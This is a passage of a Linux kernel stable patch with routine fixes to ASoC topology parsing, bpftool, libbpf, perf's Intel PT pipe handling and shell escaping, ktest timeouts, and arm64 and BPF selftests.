+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream->private_data = rtd;
+-		else if (rtd->dai_link->dpcm_capture)
++		if (rtd->dai_link->dpcm_capture)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_CAPTURE].substream->private_data = rtd;
+ 		memcpy(compr->ops, &soc_compr_dyn_ops, sizeof(soc_compr_dyn_ops));
+ 	} else {
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index a79a2fb260b87..d68c48555a7e3 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -2408,7 +2408,7 @@ static int soc_valid_header(struct soc_tplg *tplg,
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_tplg_get_hdr_offset(tplg) + hdr->payload_size >= tplg->fw->size) {
++	if (soc_tplg_get_hdr_offset(tplg) + le32_to_cpu(hdr->payload_size) >= tplg->fw->size) {
+ 		dev_err(tplg->dev,
+ 			"ASoC: invalid header of type %d at offset %ld payload_size %d\n",
+ 			le32_to_cpu(hdr->type), soc_tplg_get_hdr_offset(tplg),
+diff --git a/tools/bootconfig/scripts/ftrace2bconf.sh b/tools/bootconfig/scripts/ftrace2bconf.sh
+index 6183b36c68466..1603801cf1264 100755
+--- a/tools/bootconfig/scripts/ftrace2bconf.sh
++++ b/tools/bootconfig/scripts/ftrace2bconf.sh
+@@ -93,7 +93,7 @@ referred_vars() {
+ }
+ 
+ event_is_enabled() { # enable-file
+-	test -f $1 & grep -q "1" $1
++	test -f $1 && grep -q "1" $1
+ }
+ 
+ per_event_options() { # event-dir
+diff --git a/tools/bpf/bpftool/Makefile b/tools/bpf/bpftool/Makefile
+index 4a95c017ad4ce..a3794b3416014 100644
+--- a/tools/bpf/bpftool/Makefile
++++ b/tools/bpf/bpftool/Makefile
+@@ -187,7 +187,8 @@ $(OUTPUT)%.bpf.o: skeleton/%.bpf.c $(OUTPUT)vmlinux.h $(LIBBPF_BOOTSTRAP)
+ 		-I$(or $(OUTPUT),.) \
+ 		-I$(srctree)/tools/include/uapi/ \
+ 		-I$(LIBBPF_BOOTSTRAP_INCLUDE) \
+-		-g -O2 -Wall -target bpf -c $< -o $@
++		-g -O2 -Wall -fno-stack-protector \
++		-target bpf -c $< -o $@
+ 	$(Q)$(LLVM_STRIP) -g $@
+ 
+ $(OUTPUT)%.skel.h: $(OUTPUT)%.bpf.o $(BPFTOOL_BOOTSTRAP)
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index c81362a001ba9..41c02b6f6f043 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -2166,10 +2166,38 @@ static void profile_close_perf_events(struct profiler_bpf *obj)
+ 	profile_perf_event_cnt = 0;
+ }
+ 
++static int profile_open_perf_event(int mid, int cpu, int map_fd)
++{
++	int pmu_fd;
++
++	pmu_fd = syscall(__NR_perf_event_open, &metrics[mid].attr,
++			 -1 /*pid*/, cpu, -1 /*group_fd*/, 0);
++	if (pmu_fd < 0) {
++		if (errno == ENODEV) {
++			p_info("cpu %d may be offline, skip %s profiling.",
++				cpu, metrics[mid].name);
++			profile_perf_event_cnt++;
++			return 0;
++		}
++		return -1;
++	}
++
++	if (bpf_map_update_elem(map_fd,
++				&profile_perf_event_cnt,
++				&pmu_fd, BPF_ANY) ||
++	    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++		close(pmu_fd);
++		return -1;
++	}
++
++	profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
++	return 0;
++}
++
+ static int profile_open_perf_events(struct profiler_bpf *obj)
+ {
+ 	unsigned int cpu, m;
+-	int map_fd, pmu_fd;
++	int map_fd;
+ 
+ 	profile_perf_events = calloc(
+ 		sizeof(int), obj->rodata->num_cpu * obj->rodata->num_metric);
+@@ -2188,17 +2216,11 @@ static int profile_open_perf_events(struct profiler_bpf *obj)
+ 		if (!metrics[m].selected)
+ 			continue;
+ 		for (cpu = 0; cpu < obj->rodata->num_cpu; cpu++) {
+-			pmu_fd = syscall(__NR_perf_event_open, &metrics[m].attr,
+-					 -1/*pid*/, cpu, -1/*group_fd*/, 0);
+-			if (pmu_fd < 0 ||
+-			    bpf_map_update_elem(map_fd, &profile_perf_event_cnt,
+-						&pmu_fd, BPF_ANY) ||
+-			    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++			if (profile_open_perf_event(m, cpu, map_fd)) {
+ 				p_err("failed to create event %s on cpu %d",
+ 				      metrics[m].name, cpu);
+ 				return -1;
+ 			}
+-			profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
+ 		}
+ 	}
+ 	return 0;
+diff --git a/tools/lib/bpf/bpf_tracing.h b/tools/lib/bpf/bpf_tracing.h
+index 2972dc25ff722..9c1b1689068d1 100644
+--- a/tools/lib/bpf/bpf_tracing.h
++++ b/tools/lib/bpf/bpf_tracing.h
+@@ -137,7 +137,7 @@ struct pt_regs___s390 {
+ #define __PT_PARM3_REG gprs[4]
+ #define __PT_PARM4_REG gprs[5]
+ #define __PT_PARM5_REG gprs[6]
+-#define __PT_RET_REG grps[14]
++#define __PT_RET_REG gprs[14]
+ #define __PT_FP_REG gprs[11]	/* Works only with CONFIG_FRAME_POINTER */
+ #define __PT_RC_REG gprs[2]
+ #define __PT_SP_REG gprs[15]
+diff --git a/tools/lib/bpf/btf.c b/tools/lib/bpf/btf.c
+index 675a0df5c840f..8224a797c2da5 100644
+--- a/tools/lib/bpf/btf.c
++++ b/tools/lib/bpf/btf.c
+@@ -688,8 +688,21 @@ int btf__align_of(const struct btf *btf, __u32 id)
+ 			if (align <= 0)
+ 				return libbpf_err(align);
+ 			max_align = max(max_align, align);
++
++			/* if field offset isn't aligned according to field
++			 * type's alignment, then struct must be packed
++			 */
++			if (btf_member_bitfield_size(t, i) == 0 &&
++			    (m->offset % (8 * align)) != 0)
++				return 1;
+ 		}
+ 
++		/* if struct/union size isn't a multiple of its alignment,
++		 * then struct must be packed
++		 */
++		if ((t->size % max_align) != 0)
++			return 1;
++
+ 		return max_align;
+ 	}
+ 	default:
+diff --git a/tools/lib/bpf/nlattr.c b/tools/lib/bpf/nlattr.c
+index 3900d052ed19e..975e265eab3bf 100644
+--- a/tools/lib/bpf/nlattr.c
++++ b/tools/lib/bpf/nlattr.c
+@@ -178,7 +178,7 @@ int libbpf_nla_dump_errormsg(struct nlmsghdr *nlh)
+ 		hlen += nlmsg_len(&err->msg);
+ 
+ 	attr = (struct nlattr *) ((void *) err + hlen);
+-	alen = nlh->nlmsg_len - hlen;
++	alen = (void *)nlh + nlh->nlmsg_len - (void *)attr;
+ 
+ 	if (libbpf_nla_parse(tb, NLMSGERR_ATTR_MAX, attr, alen,
+ 			     extack_policy) != 0) {
+diff --git a/tools/lib/thermal/sampling.c b/tools/lib/thermal/sampling.c
+index ee818f4e9654d..70577423a9f0c 100644
+--- a/tools/lib/thermal/sampling.c
++++ b/tools/lib/thermal/sampling.c
+@@ -54,7 +54,7 @@ int thermal_sampling_fd(struct thermal_handler *th)
+ thermal_error_t thermal_sampling_exit(struct thermal_handler *th)
+ {
+ 	if (nl_unsubscribe_thermal(th->sk_sampling, th->cb_sampling,
+-				   THERMAL_GENL_EVENT_GROUP_NAME))
++				   THERMAL_GENL_SAMPLING_GROUP_NAME))
+ 		return THERMAL_ERROR;
+ 
+ 	nl_thermal_disconnect(th->sk_sampling, th->cb_sampling);
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 51494c3002d91..0c1b6acad141f 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -1059,6 +1059,8 @@ static const char *uaccess_safe_builtin[] = {
+ 	"__tsan_atomic64_compare_exchange_val",
+ 	"__tsan_atomic_thread_fence",
+ 	"__tsan_atomic_signal_fence",
++	"__tsan_unaligned_read16",
++	"__tsan_unaligned_write16",
+ 	/* KCOV */
+ 	"write_comp_data",
+ 	"check_kcov_mode",
+diff --git a/tools/perf/Documentation/perf-intel-pt.txt b/tools/perf/Documentation/perf-intel-pt.txt
+index 92464a5d7eafd..a764367fcb89b 100644
+--- a/tools/perf/Documentation/perf-intel-pt.txt
++++ b/tools/perf/Documentation/perf-intel-pt.txt
+@@ -1813,6 +1813,36 @@ Can be compiled and traced:
+  $
+ 
+ 
++Pipe mode
++---------
++Pipe mode is a problem for Intel PT and possibly other auxtrace users.
++It's not recommended to use a pipe as data output with Intel PT because
++of the following reason.
++
++Essentially the auxtrace buffers do not behave like the regular perf
++event buffers.  That is because the head and tail are updated by
++software, but in the auxtrace case the data is written by hardware.
++So the head and tail do not get updated as data is written.
++
++In the Intel PT case, the head and tail are updated only when the trace
++is disabled by software, for example:
++    - full-trace, system wide : when buffer passes watermark
++    - full-trace, not system-wide : when buffer passes watermark or
++                                    context switches
++    - snapshot mode : as above but also when a snapshot is made
++    - sample mode : as above but also when a sample is made
++
++That means finished-round ordering doesn't work.  An auxtrace buffer
++can turn up that has data that extends back in time, possibly to the
++very beginning of tracing.
++
++For a perf.data file, that problem is solved by going through the trace
++and queuing up the auxtrace buffers in advance.
++
++For pipe mode, the order of events and timestamps can presumably
++be messed up.
++
++
+ EXAMPLE
+ -------
+ 
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index e254f18986f7c..e2ce5f294cbd4 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -215,14 +215,14 @@ static int perf_event__repipe_event_update(struct perf_tool *tool,
+ 
+ #ifdef HAVE_AUXTRACE_SUPPORT
+ 
+-static int copy_bytes(struct perf_inject *inject, int fd, off_t size)
++static int copy_bytes(struct perf_inject *inject, struct perf_data *data, off_t size)
+ {
+ 	char buf[4096];
+ 	ssize_t ssz;
+ 	int ret;
+ 
+ 	while (size > 0) {
+-		ssz = read(fd, buf, min(size, (off_t)sizeof(buf)));
++		ssz = perf_data__read(data, buf, min(size, (off_t)sizeof(buf)));
+ 		if (ssz < 0)
+ 			return -errno;
+ 		ret = output_bytes(inject, buf, ssz);
+@@ -260,7 +260,7 @@ static s64 perf_event__repipe_auxtrace(struct perf_session *session,
+ 		ret = output_bytes(inject, event, event->header.size);
+ 		if (ret < 0)
+ 			return ret;
+-		ret = copy_bytes(inject, perf_data__fd(session->data),
++		ret = copy_bytes(inject, session->data,
+ 				 event->auxtrace.size);
+ 	} else {
+ 		ret = output_bytes(inject, event,
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 59f3d98a0196d..48c3461b496c4 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -154,6 +154,7 @@ struct record {
+ 	struct perf_tool	tool;
+ 	struct record_opts	opts;
+ 	u64			bytes_written;
++	u64			thread_bytes_written;
+ 	struct perf_data	data;
+ 	struct auxtrace_record	*itr;
+ 	struct evlist	*evlist;
+@@ -226,14 +227,7 @@ static bool switch_output_time(struct record *rec)
+ 
+ static u64 record__bytes_written(struct record *rec)
+ {
+-	int t;
+-	u64 bytes_written = rec->bytes_written;
+-	struct record_thread *thread_data = rec->thread_data;
+-
+-	for (t = 0; t < rec->nr_threads; t++)
+-		bytes_written += thread_data[t].bytes_written;
+-
+-	return bytes_written;
++	return rec->bytes_written + rec->thread_bytes_written;
+ }
+ 
+ static bool record__output_max_size_exceeded(struct record *rec)
+@@ -255,10 +249,12 @@ static int record__write(struct record *rec, struct mmap *map __maybe_unused,
+ 		return -1;
+ 	}
+ 
+-	if (map && map->file)
++	if (map && map->file) {
+ 		thread->bytes_written += size;
+-	else
++		rec->thread_bytes_written += size;
++	} else {
+ 		rec->bytes_written += size;
++	}
+ 
+ 	if (record__output_max_size_exceeded(rec) && !done) {
+ 		fprintf(stderr, "[ perf record: perf size limit reached (%" PRIu64 " KB),"
+diff --git a/tools/perf/perf-completion.sh b/tools/perf/perf-completion.sh
+index fdf75d45efff7..978249d7868c2 100644
+--- a/tools/perf/perf-completion.sh
++++ b/tools/perf/perf-completion.sh
+@@ -165,7 +165,12 @@ __perf_main ()
+ 
+ 		local cur1=${COMP_WORDS[COMP_CWORD]}
+ 		local raw_evts=$($cmd list --raw-dump)
+-		local arr s tmp result
++		local arr s tmp result cpu_evts
++
++		# aarch64 doesn't have /sys/bus/event_source/devices/cpu/events
++		if [[ `uname -m` != aarch64 ]]; then
++			cpu_evts=$(ls /sys/bus/event_source/devices/cpu/events)
++		fi
+ 
+ 		if [[ "$cur1" == */* && ${cur1#*/} =~ ^[A-Z] ]]; then
+ 			OLD_IFS="$IFS"
+@@ -183,9 +188,9 @@ __perf_main ()
+ 				fi
+ 			done
+ 
+-			evts=${result}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${result}" "${cpu_evts}
+ 		else
+-			evts=${raw_evts}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${raw_evts}" "${cpu_evts}
+ 		fi
+ 
+ 		if [[ "$cur1" == , ]]; then
+diff --git a/tools/perf/tests/bpf.c b/tools/perf/tests/bpf.c
+index 17c023823713d..6a4235a9cf57e 100644
+--- a/tools/perf/tests/bpf.c
++++ b/tools/perf/tests/bpf.c
+@@ -126,6 +126,10 @@ static int do_test(struct bpf_object *obj, int (*func)(void),
+ 
+ 	err = parse_events_load_bpf_obj(&parse_state, &parse_state.list, obj, NULL);
+ 	parse_events_error__exit(&parse_error);
++	if (err == -ENODATA) {
++		pr_debug("Failed to add events selected by BPF, debuginfo package not installed\n");
++		return TEST_SKIP;
++	}
+ 	if (err || list_empty(&parse_state.list)) {
+ 		pr_debug("Failed to add events selected by BPF\n");
+ 		return TEST_FAIL;
+@@ -368,7 +372,7 @@ static struct test_case bpf_tests[] = {
+ 			"clang isn't installed or environment missing BPF support"),
+ #ifdef HAVE_BPF_PROLOGUE
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test,
+-			"clang isn't installed or environment missing BPF support"),
++			"clang/debuginfo isn't installed or environment missing BPF support"),
+ #else
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test, "not compiled in"),
+ #endif
+diff --git a/tools/perf/tests/shell/stat_all_metrics.sh b/tools/perf/tests/shell/stat_all_metrics.sh
+index 6e79349e42bef..22e9cb294b40e 100755
+--- a/tools/perf/tests/shell/stat_all_metrics.sh
++++ b/tools/perf/tests/shell/stat_all_metrics.sh
+@@ -11,7 +11,7 @@ for m in $(perf list --raw-dump metrics); do
+     continue
+   fi
+   # Failed so try system wide.
+-  result=$(perf stat -M "$m" -a true 2>&1)
++  result=$(perf stat -M "$m" -a sleep 0.01 2>&1)
+   if [[ "$result" =~ "${m:0:50}" ]]
+   then
+     continue
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index 47062f459ccd6..6e60b6f06ab05 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -1132,6 +1132,9 @@ int auxtrace_queue_data(struct perf_session *session, bool samples, bool events)
+ 	if (auxtrace__dont_decode(session))
+ 		return 0;
+ 
++	if (perf_data__is_pipe(session->data))
++		return 0;
++
+ 	if (!session->auxtrace || !session->auxtrace->queue_data)
+ 		return -EINVAL;
+ 
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index e3548ddef2545..d1338a4071268 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -4374,6 +4374,12 @@ int intel_pt_process_auxtrace_info(union perf_event *event,
+ 
+ 	intel_pt_setup_pebs_events(pt);
+ 
++	if (perf_data__is_pipe(session->data)) {
++		pr_warning("WARNING: Intel PT with pipe mode is not recommended.\n"
++			   "         The output cannot relied upon.  In particular,\n"
++			   "         timestamps and the order of events may be incorrect.\n");
++	}
++
+ 	if (pt->sampling_mode || list_empty(&session->auxtrace_index))
+ 		err = auxtrace_queue_data(session, true, true);
+ 	else
+diff --git a/tools/perf/util/llvm-utils.c b/tools/perf/util/llvm-utils.c
+index 2dc7970074196..a9e18bb1601c7 100644
+--- a/tools/perf/util/llvm-utils.c
++++ b/tools/perf/util/llvm-utils.c
+@@ -531,14 +531,37 @@ int llvm__compile_bpf(const char *path, void **p_obj_buf,
+ 
+ 	pr_debug("llvm compiling command template: %s\n", template);
+ 
++	/*
++	 * Below, substitute control characters for values that can cause the
++	 * echo to misbehave, then substitute the values back.
++	 */
+ 	err = -ENOMEM;
+-	if (asprintf(&command_echo, "echo -n \"%s\"", template) < 0)
++	if (asprintf(&command_echo, "echo -n \a%s\a", template) < 0)
+ 		goto errout;
+ 
++#define SWAP_CHAR(a, b) do { if (*p == a) *p = b; } while (0)
++	for (char *p = command_echo; *p; p++) {
++		SWAP_CHAR('<', '\001');
++		SWAP_CHAR('>', '\002');
++		SWAP_CHAR('"', '\003');
++		SWAP_CHAR('\'', '\004');
++		SWAP_CHAR('|', '\005');
++		SWAP_CHAR('&', '\006');
++		SWAP_CHAR('\a', '"');
++	}
+ 	err = read_from_pipe(command_echo, (void **) &command_out, NULL);
+ 	if (err)
+ 		goto errout;
+ 
++	for (char *p = command_out; *p; p++) {
++		SWAP_CHAR('\001', '<');
++		SWAP_CHAR('\002', '>');
++		SWAP_CHAR('\003', '"');
++		SWAP_CHAR('\004', '\'');
++		SWAP_CHAR('\005', '|');
++		SWAP_CHAR('\006', '&');
++	}
++#undef SWAP_CHAR
+ 	pr_debug("llvm compiling command : %s\n", command_out);
+ 
+ 	err = read_from_pipe(template, &obj_buf, &obj_buf_sz);
+diff --git a/tools/power/x86/intel-speed-select/isst-config.c b/tools/power/x86/intel-speed-select/isst-config.c
+index a160bad291eb7..be3668d37d654 100644
+--- a/tools/power/x86/intel-speed-select/isst-config.c
++++ b/tools/power/x86/intel-speed-select/isst-config.c
+@@ -110,7 +110,7 @@ int is_skx_based_platform(void)
+ 
+ int is_spr_platform(void)
+ {
+-	if (cpu_model == 0x8F)
++	if (cpu_model == 0x8F || cpu_model == 0xCF)
+ 		return 1;
+ 
+ 	return 0;
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index 1737c59e4ff67..e6c381498e632 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -178,6 +178,7 @@ my $store_failures;
+ my $store_successes;
+ my $test_name;
+ my $timeout;
++my $run_timeout;
+ my $connect_timeout;
+ my $config_bisect_exec;
+ my $booted_timeout;
+@@ -340,6 +341,7 @@ my %option_map = (
+     "STORE_SUCCESSES"		=> \$store_successes,
+     "TEST_NAME"			=> \$test_name,
+     "TIMEOUT"			=> \$timeout,
++    "RUN_TIMEOUT"		=> \$run_timeout,
+     "CONNECT_TIMEOUT"		=> \$connect_timeout,
+     "CONFIG_BISECT_EXEC"	=> \$config_bisect_exec,
+     "BOOTED_TIMEOUT"		=> \$booted_timeout,
+@@ -1488,7 +1490,8 @@ sub reboot {
+ 
+ 	# Still need to wait for the reboot to finish
+ 	wait_for_monitor($time, $reboot_success_line);
+-
++    }
++    if ($powercycle || $time) {
+ 	end_monitor;
+     }
+ }
+@@ -1850,6 +1853,14 @@ sub run_command {
+     $command =~ s/\$SSH_USER/$ssh_user/g;
+     $command =~ s/\$MACHINE/$machine/g;
+ 
++    if (!defined($timeout)) {
++	$timeout = $run_timeout;
++    }
++
++    if (!defined($timeout)) {
++	$timeout = -1; # tell wait_for_input to wait indefinitely
++    }
++
+     doprint("$command ... ");
+     $start_time = time;
+ 
+@@ -1876,13 +1887,10 @@ sub run_command {
+ 
+     while (1) {
+ 	my $fp = \*CMD;
+-	if (defined($timeout)) {
+-	    doprint "timeout = $timeout\n";
+-	}
+ 	my $line = wait_for_input($fp, $timeout);
+ 	if (!defined($line)) {
+ 	    my $now = time;
+-	    if (defined($timeout) && (($now - $start_time) >= $timeout)) {
++	    if ($timeout >= 0 && (($now - $start_time) >= $timeout)) {
+ 		doprint "Hit timeout of $timeout, killing process\n";
+ 		$hit_timeout = 1;
+ 		kill 9, $pid;
+@@ -2054,6 +2062,11 @@ sub wait_for_input {
+ 	$time = $timeout;
+     }
+ 
++    if ($time < 0) {
++	# Negative number means wait indefinitely
++	undef $time;
++    }
++
+     $rin = '';
+     vec($rin, fileno($fp), 1) = 1;
+     vec($rin, fileno(\*STDIN), 1) = 1;
+@@ -4193,6 +4206,9 @@ sub send_email {
+ }
+ 
+ sub cancel_test {
++    if ($monitor_cnt) {
++	end_monitor;
++    }
+     if ($email_when_canceled) {
+ 	my $name = get_test_name;
+ 	send_email("KTEST: Your [$name] test was cancelled",
+diff --git a/tools/testing/ktest/sample.conf b/tools/testing/ktest/sample.conf
+index 5e7d1d7297529..65957a9803b50 100644
+--- a/tools/testing/ktest/sample.conf
++++ b/tools/testing/ktest/sample.conf
+@@ -809,6 +809,11 @@
+ # is issued instead of a reboot.
+ # CONNECT_TIMEOUT = 25
+ 
++# The timeout in seconds for how long to wait for any running command
++# to timeout. If not defined, it will let it go indefinitely.
++# (default undefined)
++#RUN_TIMEOUT = 600
++
+ # In between tests, a reboot of the box may occur, and this
+ # is the time to wait for the console after it stops producing
+ # output. Some machines may not produce a large lag on reboot
+diff --git a/tools/testing/selftests/Makefile b/tools/testing/selftests/Makefile
+index f07aef7c592c2..aae64eb2ae737 100644
+--- a/tools/testing/selftests/Makefile
++++ b/tools/testing/selftests/Makefile
+@@ -233,8 +233,8 @@ ifdef INSTALL_PATH
+ 	@# included in the generated runlist.
+ 	for TARGET in $(TARGETS); do \
+ 		BUILD_TARGET=$$BUILD/$$TARGET;	\
+-		[ ! -d $(INSTALL_PATH)/$$TARGET ] && echo "Skipping non-existent dir: $$TARGET" && continue; \
+-		echo -ne "Emit Tests for $$TARGET\n"; \
++		[ ! -d $(INSTALL_PATH)/$$TARGET ] && printf "Skipping non-existent dir: $$TARGET\n" && continue; \
++		printf "Emit Tests for $$TARGET\n"; \
+ 		$(MAKE) -s --no-print-directory OUTPUT=$$BUILD_TARGET COLLECTION=$$TARGET \
+ 			-C $$TARGET emit_tests >> $(TEST_LIST); \
+ 	done;
+diff --git a/tools/testing/selftests/arm64/abi/syscall-abi.c b/tools/testing/selftests/arm64/abi/syscall-abi.c
+index dd7ebe536d05f..ffe719b50c215 100644
+--- a/tools/testing/selftests/arm64/abi/syscall-abi.c
++++ b/tools/testing/selftests/arm64/abi/syscall-abi.c
+@@ -390,6 +390,10 @@ static void test_one_syscall(struct syscall_cfg *cfg)
+ 
+ 			sme_vl &= PR_SME_VL_LEN_MASK;
+ 
++			/* Found lowest VL */
++			if (sve_vq_from_vl(sme_vl) > sme_vq)
++				break;
++
+ 			if (sme_vq != sve_vq_from_vl(sme_vl))
+ 				sme_vq = sve_vq_from_vl(sme_vl);
+ 
+@@ -461,6 +465,10 @@ int sme_count_vls(void)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Found lowest VL */
++		if (sve_vq_from_vl(vl) > vq)
++			break;
++
+ 		if (vq != sve_vq_from_vl(vl))
+ 			vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/fp/Makefile b/tools/testing/selftests/arm64/fp/Makefile
+index 36db61358ed5b..932ec8792316d 100644
+--- a/tools/testing/selftests/arm64/fp/Makefile
++++ b/tools/testing/selftests/arm64/fp/Makefile
+@@ -3,7 +3,7 @@
+ # A proper top_srcdir is needed by KSFT(lib.mk)
+ top_srcdir = $(realpath ../../../../../)
+ 
+-CFLAGS += -I$(top_srcdir)/usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := fp-stress \
+ 	sve-ptrace sve-probe-vls \
+diff --git a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+index d0a178945b1a8..c6b17c47cac4c 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/signal/testcases/za_regs.c b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+index ea45acb115d5b..174ad66566964 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/za_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/tags/Makefile b/tools/testing/selftests/arm64/tags/Makefile
+index 41cb750705117..6d29cfde43a21 100644
+--- a/tools/testing/selftests/arm64/tags/Makefile
++++ b/tools/testing/selftests/arm64/tags/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := tags_test
+ TEST_PROGS := run_tags_test.sh
+ 
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index e6cf21fad69f0..687249d99b5f1 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -149,8 +149,6 @@ endif
+ # NOTE: Semicolon at the end is critical to override lib.mk's default static
+ # rule for binaries.
+ $(notdir $(TEST_GEN_PROGS)						\
+-	 $(TEST_PROGS)							\
+-	 $(TEST_PROGS_EXTENDED)						\
+ 	 $(TEST_GEN_PROGS_EXTENDED)					\
+ 	 $(TEST_CUSTOM_PROGS)): %: $(OUTPUT)/% ;
+ 
+@@ -181,15 +179,17 @@ endif
+ # do not fail. Static builds leave urandom_read relying on system-wide shared libraries.
+ $(OUTPUT)/liburandom_read.so: urandom_read_lib1.c urandom_read_lib2.c
+ 	$(call msg,LIB,,$@)
+-	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $^ $(LDLIBS)   \
+-		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -fPIC -shared -o $@
++	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS))   \
++		     $^ $(filter-out -static,$(LDLIBS))	     \
++		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
++		     -fPIC -shared -o $@
+ 
+ $(OUTPUT)/urandom_read: urandom_read.c urandom_read_aux.c $(OUTPUT)/liburandom_read.so
+ 	$(call msg,BINARY,,$@)
+ 	$(Q)$(CLANG) $(filter-out -static,$(CFLAGS) $(LDFLAGS)) $(filter %.c,$^) \
+-		     liburandom_read.so $(LDLIBS)			       \
+-		     -fuse-ld=$(LLD) -Wl,-znoseparate-code		       \
+-		     -Wl,-rpath=. -Wl,--build-id=sha1 -o $@
++		     liburandom_read.so $(filter-out -static,$(LDLIBS))	     \
++		     -fuse-ld=$(LLD) -Wl,-znoseparate-code -Wl,--build-id=sha1 \
++		     -Wl,-rpath=. -o $@
+ 
+ $(OUTPUT)/sign-file: ../../../../scripts/sign-file.c
+ 	$(call msg,SIGN-FILE,,$@)
+diff --git a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+index 9ac6f6a268db2..15ad336691613 100644
+--- a/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
++++ b/tools/testing/selftests/bpf/prog_tests/xdp_do_redirect.c
+@@ -65,7 +65,11 @@ static int attach_tc_prog(struct bpf_tc_hook *hook, int fd)
+ /* The maximum permissible size is: PAGE_SIZE - sizeof(struct xdp_page_head) -
+  * sizeof(struct skb_shared_info) - XDP_PACKET_HEADROOM = 3368 bytes
+  */
++#if defined(__s390x__)
++#define MAX_PKT_SIZE 3176
++#else
+ #define MAX_PKT_SIZE 3368
++#endif
+ static void test_max_pkt_size(int fd)
+ {
+ 	char data[MAX_PKT_SIZE + 1] = {};
+diff --git a/tools/testing/selftests/bpf/progs/map_kptr.c b/tools/testing/selftests/bpf/progs/map_kptr.c
+index eb82178034934..228ec45365a8d 100644
+--- a/tools/testing/selftests/bpf/progs/map_kptr.c
++++ b/tools/testing/selftests/bpf/progs/map_kptr.c
+@@ -62,21 +62,23 @@ extern struct prog_test_ref_kfunc *
+ bpf_kfunc_call_test_kptr_get(struct prog_test_ref_kfunc **p, int a, int b) __ksym;
+ extern void bpf_kfunc_call_test_release(struct prog_test_ref_kfunc *p) __ksym;
+ 
++#define WRITE_ONCE(x, val) ((*(volatile typeof(x) *) &(x)) = (val))
++
+ static void test_kptr_unref(struct map_value *v)
+ {
+ 	struct prog_test_ref_kfunc *p;
+ 
+ 	p = v->unref_ptr;
+ 	/* store untrusted_ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+ 		return;
+ 	/* store untrusted_ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	/* store NULL */
+-	v->unref_ptr = NULL;
++	WRITE_ONCE(v->unref_ptr, NULL);
+ }
+ 
+ static void test_kptr_ref(struct map_value *v)
